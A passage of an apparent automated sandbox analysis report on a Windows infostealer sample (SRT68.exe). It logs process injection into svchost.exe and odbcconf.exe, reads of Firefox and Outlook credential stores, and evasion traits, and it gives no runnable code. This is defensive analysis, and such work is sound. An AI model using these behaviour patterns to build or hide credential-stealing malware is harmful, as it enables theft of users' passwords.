                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04F0AB404_2_04F0AB40
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E414604_2_04E41460
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04F0F43F4_2_04F0F43F
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04F195C34_2_04F195C3
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04EED5B04_2_04EED5B0
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04F075714_2_04F07571
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04F016CC4_2_04F016CC
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E956304_2_04E95630
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04F0F7B04_2_04F0F7B0
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04F0F0E04_2_04F0F0E0
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04F070E94_2_04F070E9
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04EFF0CC4_2_04EFF0CC
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E570C04_2_04E570C0
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E5B1B04_2_04E5B1B0
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E8516C4_2_04E8516C
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E3F1724_2_04E3F172
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04F1B16B4_2_04F1B16B
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04EF12ED4_2_04EF12ED
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E6B2C04_2_04E6B2C0
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E552A04_2_04E552A0
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E9739A4_2_04E9739A
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E3D34C4_2_04E3D34C
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04F0132D4_2_04F0132D
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04F0FCF24_2_04F0FCF2
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04EC9C324_2_04EC9C32
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E6FDC04_2_04E6FDC0
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04F07D734_2_04F07D73
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E53D404_2_04E53D40
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04F01D5A4_2_04F01D5A
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E59EB04_2_04E59EB0
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04F0FFB14_2_04F0FFB1
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E51F924_2_04E51F92
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04F0FF094_2_04F0FF09
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E538E04_2_04E538E0
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04EBD8004_2_04EBD800
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E599504_2_04E59950
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E6B9504_2_04E6B950
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04EE59104_2_04EE5910
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04EFDAC64_2_04EFDAC6
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04EEDAAC4_2_04EEDAAC
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E95AA04_2_04E95AA0
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04EF1AA34_2_04EF1AA3
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04EC3A6C4_2_04EC3A6C
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04F07A464_2_04F07A46
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04F0FA494_2_04F0FA49
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E8DBF94_2_04E8DBF9
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04EC5BF04_2_04EC5BF0
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E6FB804_2_04E6FB80
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04F0FB764_2_04F0FB76
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_02EE1E404_2_02EE1E40
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_02EDAF404_2_02EDAF40
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_02EDCF504_2_02EDCF50
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_02EDCD304_2_02EDCD30
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_02EDB0864_2_02EDB086
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_02EDB0904_2_02EDB090
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_02EE36CC4_2_02EE36CC
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_02EE36D04_2_02EE36D0
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_02EE54C04_2_02EE54C0
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_02EFBB304_2_02EFBB30
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04CAE4144_2_04CAE414
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04CAE7AD4_2_04CAE7AD
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04CAE2F54_2_04CAE2F5
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04CAD8784_2_04CAD878
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: String function: 04E3B970 appears 280 times
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: String function: 04E97E54 appears 111 times
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: String function: 04EBEA12 appears 86 times
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: String function: 04ECF290 appears 105 times
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: String function: 04E85130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03787E54 appears 111 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 037BF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03775130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0372B970 appears 280 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 037AEA12 appears 86 times
                Source: C:\Users\user\Desktop\SRT68.exeCode function: String function: 00FC0AE3 appears 70 times
                Source: C:\Users\user\Desktop\SRT68.exeCode function: String function: 00FC8900 appears 42 times
                Source: C:\Users\user\Desktop\SRT68.exeCode function: String function: 00FA7DE1 appears 35 times
                Source: SRT68.exe, 00000000.00000003.1387027138.000000000400D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SRT68.exe
                Source: SRT68.exe, 00000000.00000003.1384732798.0000000003E63000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SRT68.exe
                Source: SRT68.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@16/13
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_0100A06A GetLastError,FormatMessageW,0_2_0100A06A
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FF81CB AdjustTokenPrivileges,CloseHandle,0_2_00FF81CB
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FF87E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00FF87E1
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_0100B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0100B333
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_0101EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0101EE0D
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_0100C397 CoInitialize,CoCreateInstance,CoUninitialize,0_2_0100C397
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FA4E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00FA4E89
                Source: C:\Users\user\Desktop\SRT68.exeFile created: C:\Users\user\AppData\Local\Temp\autE66D.tmpJump to behavior
                Source: SRT68.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\SRT68.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: odbcconf.exe, 00000004.00000002.3834317306.000000000329F000.00000004.00000020.00020000.00000000.sdmp, odbcconf.exe, 00000004.00000002.3834317306.00000000032C2000.00000004.00000020.00020000.00000000.sdmp, odbcconf.exe, 00000004.00000002.3834317306.0000000003294000.00000004.00000020.00020000.00000000.sdmp, odbcconf.exe, 00000004.00000003.1685575934.0000000003294000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: SRT68.exeReversingLabs: Detection: 50%
                Source: SRT68.exeVirustotal: Detection: 32%
                Source: unknownProcess created: C:\Users\user\Desktop\SRT68.exe "C:\Users\user\Desktop\SRT68.exe"
                Source: C:\Users\user\Desktop\SRT68.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\SRT68.exe"
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exeProcess created: C:\Windows\SysWOW64\odbcconf.exe "C:\Windows\SysWOW64\odbcconf.exe"
                Source: C:\Windows\SysWOW64\odbcconf.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\SRT68.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\SRT68.exe"Jump to behavior
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exeProcess created: C:\Windows\SysWOW64\odbcconf.exe "C:\Windows\SysWOW64\odbcconf.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\odbcconf.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SRT68.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\SRT68.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\SRT68.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\SRT68.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\SRT68.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\SRT68.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SRT68.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\SRT68.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\SRT68.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\SRT68.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\SRT68.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\SRT68.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\odbcconf.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\odbcconf.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\odbcconf.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\odbcconf.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\odbcconf.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\odbcconf.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\odbcconf.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\odbcconf.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\odbcconf.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\odbcconf.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\odbcconf.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\odbcconf.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\odbcconf.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\odbcconf.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\odbcconf.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\odbcconf.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\odbcconf.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\odbcconf.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\odbcconf.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\odbcconf.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\odbcconf.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\odbcconf.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\odbcconf.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\odbcconf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\SysWOW64\odbcconf.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: SRT68.exeStatic file information: File size 1211392 > 1048576
                Source: SRT68.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: SRT68.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: SRT68.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: SRT68.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: SRT68.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: SRT68.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: SRT68.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: VdxisCThGA.exe, 00000003.00000000.1410310417.000000000030E000.00000002.00000001.01000000.00000004.sdmp, VdxisCThGA.exe, 00000006.00000000.1569343495.000000000030E000.00000002.00000001.01000000.00000004.sdmp
                Source: Binary string: wntdll.pdbUGP source: SRT68.exe, 00000000.00000003.1386649368.0000000003D40000.00000004.00001000.00020000.00000000.sdmp, SRT68.exe, 00000000.00000003.1387447363.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1389053744.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1488922388.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1488922388.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1391476823.0000000003500000.00000004.00000020.00020000.00000000.sdmp, odbcconf.exe, 00000004.00000002.3835765715.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, odbcconf.exe, 00000004.00000003.1498460984.0000000004AA0000.00000004.00000020.00020000.00000000.sdmp, odbcconf.exe, 00000004.00000003.1500728180.0000000004C5D000.00000004.00000020.00020000.00000000.sdmp, odbcconf.exe, 00000004.00000002.3835765715.0000000004FAE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: SRT68.exe, 00000000.00000003.1386649368.0000000003D40000.00000004.00001000.00020000.00000000.sdmp, SRT68.exe, 00000000.00000003.1387447363.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1389053744.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1488922388.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1488922388.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1391476823.0000000003500000.00000004.00000020.00020000.00000000.sdmp, odbcconf.exe, odbcconf.exe, 00000004.00000002.3835765715.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, odbcconf.exe, 00000004.00000003.1498460984.0000000004AA0000.00000004.00000020.00020000.00000000.sdmp, odbcconf.exe, 00000004.00000003.1500728180.0000000004C5D000.00000004.00000020.00020000.00000000.sdmp, odbcconf.exe, 00000004.00000002.3835765715.0000000004FAE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: odbcconf.exe, 00000004.00000002.3834317306.0000000003213000.00000004.00000020.00020000.00000000.sdmp, odbcconf.exe, 00000004.00000002.3836668787.000000000543C000.00000004.10000000.00040000.00000000.sdmp, VdxisCThGA.exe, 00000006.00000000.1570186460.0000000002DAC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1794476938.00000000309AC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: odbcconf.exe, 00000004.00000002.3834317306.0000000003213000.00000004.00000020.00020000.00000000.sdmp, odbcconf.exe, 00000004.00000002.3836668787.000000000543C000.00000004.10000000.00040000.00000000.sdmp, VdxisCThGA.exe, 00000006.00000000.1570186460.0000000002DAC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1794476938.00000000309AC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: odbcconf.pdb source: svchost.exe, 00000002.00000003.1456315544.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1488812464.0000000003000000.00000004.00000020.00020000.00000000.sdmp, VdxisCThGA.exe, 00000003.00000003.1426555684.000000000100B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: odbcconf.pdbGCTL source: svchost.exe, 00000002.00000003.1456315544.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1488812464.0000000003000000.00000004.00000020.00020000.00000000.sdmp, VdxisCThGA.exe, 00000003.00000003.1426555684.000000000100B000.00000004.00000001.00020000.00000000.sdmp
                Source: SRT68.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: SRT68.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: SRT68.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: SRT68.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: SRT68.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FA4B37 LoadLibraryA,GetProcAddress,0_2_00FA4B37
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FC8945 push ecx; ret 0_2_00FC8958
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00419071 push edx; iretd 2_2_00419072
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042D0D3 push ss; ret 2_2_0042D17B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00403080 push eax; ret 2_2_00403082
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00412167 push ebx; iretd 2_2_004121AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D2E7 push 156EFA12h; iretd 2_2_0040D2EC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00411B18 push esi; retf 2_2_00411B25
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00405B38 push eax; ret 2_2_00405B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A4F3 push edi; iretd 2_2_0041A4FE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004235A3 push edx; retf 2_2_004235CE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D61F push eax; ret 2_2_0040D621
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D637 push eax; ret 2_2_0040D621
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004156F7 push edx; ret 2_2_00415709
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370225F pushad ; ret 2_2_037027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037027FA pushad ; ret 2_2_037027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037309AD push ecx; mov dword ptr [esp], ecx2_2_037309B6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370283D push eax; iretd 2_2_03702858
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E127FA pushad ; ret 4_2_04E127F9
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E1225F pushad ; ret 4_2_04E127F9
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E1283D push eax; iretd 4_2_04E12858
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E409AD push ecx; mov dword ptr [esp], ecx4_2_04E409B6
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_02EDE37E push esi; iretd 4_2_02EDE337
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_02EDE373 pushad ; retf 4_2_02EDE374
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_02EDE329 push esi; iretd 4_2_02EDE337
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_02EDE330 push esi; iretd 4_2_02EDE337
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_02EFA050 push ss; ret 4_2_02EFA0F8
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_02EE2674 push edx; ret 4_2_02EE2686
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_02EE4558 push ecx; ret 4_2_02EE455A
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_02EF0520 push edx; retf 4_2_02EF054B
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_02ED2AB5 push eax; ret 4_2_02ED2ABF
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_02EDEA95 push esi; retf 4_2_02EDEAA2
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FA48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00FA48D7
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_01025376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_01025376
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FC3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00FC3187
                Source: C:\Users\user\Desktop\SRT68.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SRT68.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\odbcconf.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\odbcconf.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\odbcconf.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\odbcconf.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\odbcconf.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\SRT68.exeAPI/Special instruction interceptor: Address: 15B19EC
                Source: C:\Windows\SysWOW64\odbcconf.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD324
                Source: C:\Windows\SysWOW64\odbcconf.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD7E4
                Source: C:\Windows\SysWOW64\odbcconf.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD944
                Source: C:\Windows\SysWOW64\odbcconf.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD504
                Source: C:\Windows\SysWOW64\odbcconf.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD544
                Source: C:\Windows\SysWOW64\odbcconf.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD1E4
                Source: C:\Windows\SysWOW64\odbcconf.exeAPI/Special instruction interceptor: Address: 7FFBCB7B0154
                Source: C:\Windows\SysWOW64\odbcconf.exeAPI/Special instruction interceptor: Address: 7FFBCB7ADA44
                Source: SRT68.exe, 00000000.00000002.1389505669.0000000001666000.00000004.00000020.00020000.00000000.sdmp, SRT68.exe, 00000000.00000003.1378189870.00000000015FA000.00000004.00000020.00020000.00000000.sdmp, SRT68.exe, 00000000.00000003.1378288144.0000000001666000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE#
